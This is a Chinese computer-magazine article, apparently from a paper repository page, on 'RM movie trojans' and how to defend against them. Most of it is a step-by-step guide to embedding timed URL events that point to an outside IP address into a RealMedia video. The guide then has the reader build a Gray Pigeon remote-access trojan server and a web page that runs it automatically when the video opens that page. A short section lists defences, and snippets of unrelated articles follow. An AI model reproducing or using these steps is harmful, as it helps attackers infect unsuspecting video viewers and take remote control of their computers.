瞒天过海

来源 :电脑知识与技术 | 被引量 : 0次 | 上传用户:JC1220
下载到本地 , 更方便阅读
声明 : 本文档内容版权归属内容提供方 , 如果您对本文有版权争议 , 可与客服联系进行内容授权或下架
论文部分内容阅读
  如今,各种病毒木马伪装越来越好,你曾想过在看电影的时候也会中招?影片木马正是充分利用了这一入侵思路,它非常巧妙地将自己“融入”到人们喜欢的影片中,在人们最不易设防的影片中潜伏了下来。一旦用户下载并观看影片,那么潜伏的木马就发作了!
  
  RM影片木马制作实战
  
  躲藏得非常隐蔽的影片木马到底是如何制作的呢?下面我们一起来看看。制作RM影片木马需要两个步骤:一是让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页,这一点很容易做到。二是在指定的网页中要放置恶意代码、病毒等程序。两者结合后,就是一个标准的RM影片木马了。下面,我们来看看制作过程。
  让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页这一步的制作,需使用Helix Producer Plus来完成。
  在下载完毕并安装完成后,首先使用任一款播放器打开要捆绑弹出网页代码的RM影片,在其中观察一下影片播放的时间长度。在如图所示中,可以看出影片的长度是10分21秒。(图1)
  根据影片的总长度,我们可以决定在影片中隔多少时间放一次弹出网页代码,从而使影片的播放中处处“危机四伏”。假设,我们打算实现如下目的:
  在影片“009.rm”的播放中,在00:01:01至00:01:30这个时间范围中,自动弹出“http:// ***.93.223.135/index.asp”页面。
  在影片“009.rm”的播放中,在00:03:00至00:03:30这个时间范围中,自动弹出“http:// ***.93.223.135/web/index.asp”页面。
  根据这个目标,开始在RM中捆绑网页弹出代码,方法如下:
  (1)新建一个文本文件,在其中输入如下命令:
  u 00:01:01 00:01:30 http://218.93.223.135/index.asp
  u 00:03:00 00:03:30 http://218.93.223.135/web/index.asp
  输入完毕后,将文件保存成名为“001”(可以任意命名)的文本文件。如图2所示。
  现在解释一下代码的含义,以第一行代码为例,代码中的u表示URL事件,这个事件将激活IE浏览器的自动弹出;00:01:00是起始时间;00:01:30.001:10是结束时间;后面则是指定的要自动打开的网页。
  (2)进入“C:\Program Files
  Real\Helix Producer Plus\RealMe
  diaEditor\”文件夹,找到名为Rmedtgui.exe文件。
  (3)双击运行Rmedtgui.exe文件后,在弹出的如图所示窗口中,依次单击“File”→“Open RealMedia File”菜单。(图3)
  (4)在将名为“009.rm”的文件添加进来后,再依次单击“Tools”→“Merge Events”菜单。如图4所示。
  (5)在弹出的对话框中,将前面生成的名为“001.txt”文件添加进来。
  (6)在单击“打开”按钮后,将出现如图所示的合并事件进度框。(图5)
  (7)在合并完成后,依次单击“File”→“Save RealMedia File As”菜单。将写入事件的RM文件另存为一个新的RM文件,如图所示的“0091.rm”。(图6)
  (8)稍后,将出现保存过程,这个过程将会把写入事件后的RM文件创建出来。保存完毕后,将Rmedtgui.exe窗口关闭。并用RealPlayer播放生成的00.91文件,在播放到指定时间时,就会自动弹出浏览窗口(RealPlayer内置了浏览器,所以会使用内置的浏览器。),并打开指定的网页页面内容。
  (9)在第一步成功完成后,就可以进行第二步的在网页中添加木马的操作了。添加的木马的操作有两步:一是使用灰鸽子等木马工具制作出一个服务器端。如图7所示。二是使用制作网页木马工具,指定访问特定的网页时能够自动运行灰鸽子服务器端。如图8所示。
  接着,将具有灰鸽子服务器端和能够调用灰鸽子服务器端的网页一起上传到服务器指定的路径。
  
  RM影片木马的防范
  
  在明白了RM影片木马的危害后,现在再来看看如何防范RM影片木马。通常,我们可以使用如下的几种方法来解决问题:
  第一种是不使用RealPlayer播放RM文件,推荐使用KMPlayer这类第三方播放器进行播放,这样RM影片中的自动弹出代码将不会被响应,这是一种完全被动的防御方法。
  第二种是使用各种防火墙禁止RealPlayer对网络的访问。其优势是RealPlayer无法使用内置的浏览器连接至指定的网页,进而杜绝了网页中的木马服务器端的下载。其不足之处是在线播放的影片没法使用RealPlayer看了。
  第三种方法是下载专用清除工具,如“Real文件广告清除工具”这类的工具,就可以把RM影片中内置的恶意代码清除掉,这是一种比彻底的解决方法。如图9所示。
  最后,要说明的是,除了RM影片木马外,实际上还有很多种影片都可以被人为地添加上木马或恶代码,针对这种问题,对于电脑初学者来说,目前比较好的解决方法仍是使用第三方播放器,或是使用防火墙禁用播放器的网络访问功能来临时解决问题。
  注:本文中所涉及到的图表、注解、公式等内容请以PDF格式阅读原文。
其他文献
目前,如果用户要对文字进行处理,Word是最常用的工具之一,它的功能十分的强大,笔者根据平时的使用经验,特总结出一些技巧,该技巧简单且实用,但大家在平时的使用中并没有掌握,更谈不上运用,因此,在此笔者将其详细介绍如下,希望对你有一定的帮助。      技巧一:一次性保存全部文档???   由于Windows窗口的多任务性,当我们同时打开多个Word文档进行编辑时,能否将这些Word文档一次性保存呢
期刊
游戏,玩家的最爱;性能,游戏玩家的目标,与显卡一样,要想更好地体验游戏的乐趣,CPU的性能高低直接关系到游戏的速度。尽管硬件水平可以赶超游戏软件的进度,但大部分用户却无法跟随CPU的潮流。低端赛扬D与闪龙依然是普通游戏的目标,默认情况下,这些CPU运行主流3D游戏很吃力,不过我们通过适当的优化,能够提升CPU的游戏处理性能。      一、优化设置BIOS      对于一些主板而言,默认情况下,
期刊
显示器作为计算机的“面子”,是我们与计算机沟通的主要桥梁,但人们常只注意到怎样选购它,而在购买后忽略对它的正确使用,以致使显示器出现一些故障,从而影响了正常使用。不管是CRT显示器,还是LCD显示器,由于各方面的原因,在使用过程中,的确或多或少会出现一些常见的故障问题,如何排除这些故障并及时解决,对用户而言是非常关键的,本文就告诉大家如何解决显示器常见的故障。      1.显示器电源指示灯不亮
期刊
编辑文档或演示文稿时,经常会用到艺术填充字,也就是用图片作字的背景,类似于镂空的效果,如图1所示。通常情况下,这种效果得用PhotoShop之类的专业软件来搞定。但是,为几个文字去请动PhotoShop这样的大块头软件也有点不值得。其实,不脱离WPS环境,我们就可以做出这样的效果,实现方法也非常简单。   运行WPS 2005,点击“绘图”工具栏中的“插入艺术字”按钮,或者点击菜单命令“插入→图片
期刊
笔记本电池使用时间长了,就常常充不满,甚至显示电池损坏。因此,电池的保养和恢复是笔记本电脑用户需要关心的话题。电池在使用了一段时间之后就会衰老,具体表现是内阻变大,在充电的时候两端电压上升得比较快,这样就容易被充电控制线路判定为已经充满了,容量下降之后自然导致笔记本续航时间不足(其实是有电放不出)。   锂离子电池的正极材料通常由锂的活性化合物组成,负极则是特殊分子结构的碳。常见的正极材料主要成分
期刊
前段时间我们学校要求每个学生交6张相片,我班有几个学生来找我商量,告诉我照相馆照证件照要5元/人,而洗一张5寸相片才0.5元,不如班上自已用数码相机照好只去洗相片,还可节省点费用。我觉得学生能想得这么周到,当然要支持,于是照学生意见,我拿着照得还不错的几十张相片就兴冲冲地来到照像馆,心想5元的事我们只要5毛就办到了,但是工作人员说5寸证件照洗相一律3元/张,与普通5寸相价格不一样。为什么呢?因为要
期刊
冬季来临,春节与元宵已经不是那么遥远。对摄像爱好者来说,看到冬天的雪景,看到过春节和元宵节美丽的烟火,特别想用自己手中的摄像机记录下他们的精彩瞬间,现把如何能够把雪天的美丽以及烟火的绚丽拍摄心得总结一下。      1.雪景的拍摄      看到美丽的雪景,谁都会兴奋,对摄像爱好者来说更是激动不已。但对没有拍摄过雪景的人来说,存在一定的难度。因为在雪天,整个大地雪白一片,甚至会刺激人的眼睛。这时选
期刊
我朋友的多媒体音箱在长时间大音量放音的虐待下终于趴窝了,一声也不吭连电源的指示灯也不亮,看来事态严重,所以他把音箱搬到了我家让我帮助维修。   我拆开箱体后用万用表测量了电源部分发现没有问题,但功放块烧了一对。结合电源指示这一点看来应该是变压器有问题了。我又分别测量了变压器的初级和次级,初级是好的,次级烧断路了,换一个变压器就可以解决这个问题 。可我发现这个变压器的线圈上有一个小突起。再将变压器的
期刊
众所周知,在信息时代中信息的保密是极为重要的。如何保密,方法和措施有许多,最为常见的便是采用密码,密钥。不过在最近几年,一种既古老又新颖的保密措施开始在各个应用领域出现了,并且得到了迅速的发展,这就是   ——指纹识别。   据考古学家证实:公元前7000年到6000年以前,指纹作为身份鉴别的工具已经在古叙利亚开始应用,可以说这是最为古老的身份证。不过如今这一古老的身份证在新时代中再次焕发出了青春
期刊
单位新进了一台品牌机,配置相当高,双核+1G内存+大硬盘+独显256M显存。大伙都在说这种好机不能被共享那真的是浪费嘛!于是一致要求,除原机主外至少还要能实现2人共享,但机主发话,要在既不影响他工作,又不更换操作系统的情况下共享。经查随机安装的为XPHOME版!晕!地球人都知道HOME版是受限制的。怎么办?经过努力,皇天不负苦心人,终于实现了共享终极WINXPHOME,特此写下此攻略希望给有类似需
期刊